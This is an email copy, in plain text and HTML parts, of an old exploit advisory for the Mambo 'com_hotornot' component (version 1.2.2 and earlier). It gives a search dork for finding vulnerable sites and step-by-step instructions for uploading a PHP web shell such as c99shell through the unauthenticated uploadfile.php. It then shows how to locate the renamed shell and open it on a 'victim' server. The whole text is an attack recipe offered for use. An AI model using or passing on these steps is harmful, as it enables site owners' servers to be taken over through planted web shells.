------=_Part_262466_33113660.1158601122097
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
########################################################################
# Mambo com_hotornot <= 1.2.2 Remote File Upload Exploit
#
# Download Source : http://mamboxchange.com/projects/hotornot/
# Dork = allinurl:com_hotornot
#
# Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com
# Location: Indonesia
#########################################################################
file ;
uploadfile.php
########################################################################
bugs ;
Remote User can Upload anything files without Identification
#########################################################################
example and methode exploit ;
-> open u'r browser
http://victim.xxx/components/com_hotornot/uploadfile.php?
-> upload u'r shell (c99shell.php or r57shell.php) remember .php not .txt or
others
-> u can see error page;
Failed: $AvailableImageOutputFormats = array(text;wbmp;png;jpeg) in file "
phpthumb.class.php
" on line 473
bla...bla...bla..bla
Step 2
-> View page source this page, find with u'r file name(c99shell.php),u can
see like this
-> now u can acces c99shell.php
http://victim.xxx/components/com_hotornot/hotornot/20060918001128_c99shell.php
?
-> done
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
person; y3dips, lirva32, the_day,(&all echo staff) ghoz, home_edition2001,
iFX, and for all (friend's&enemy)
------=_Part_262466_33113660.1158601122097
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
######################################################################## # Mambo com_hotornot <= 1.2.2 Remote File Upload Exploit # # Download Source : http://mamboxchange.com/projects/hotornot/
# Dork = allinurl:com_hotornot # # Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com # Location: Indonesia ######################################################################### file ; uploadfile.php
######################################################################## bugs ; Remote User can Upload anything files without Identification #########################################################################
example and methode exploit ; -> open u'r browserhttp://victim.xxx/components/com_hotornot/uploadfile.php ? -> upload u'r shell (
c99shell.php or r57shell.php) remember .php not .txt or others -> u can see error page; Failed: $AvailableImageOutputFormats = array(text;wbmp;png;jpeg) in file "phpthumb.class.php " on line 473
bla...bla...bla..bla Step 2 -> View page source this page, find with u'r file name(c99shell.php),u can see like this <input type="hidden" value="20060918001128_c99shell.php" name="userfile">
-> now u can acces c99shell.phphttp://victim.xxx/components/com_hotornot/hotornot/20060918001128_c99shell.php ?
-> done ######################################################################## Thanks; str0ke milw0rm google #e-c-h-o (all member echo community) #nyubi (all member solpotcrew community) person; y3dips, lirva32, the_day,(&all echo staff) ghoz, home_edition2001, iFX, and for all (friend's&enemy)
------=_Part_262466_33113660.1158601122097--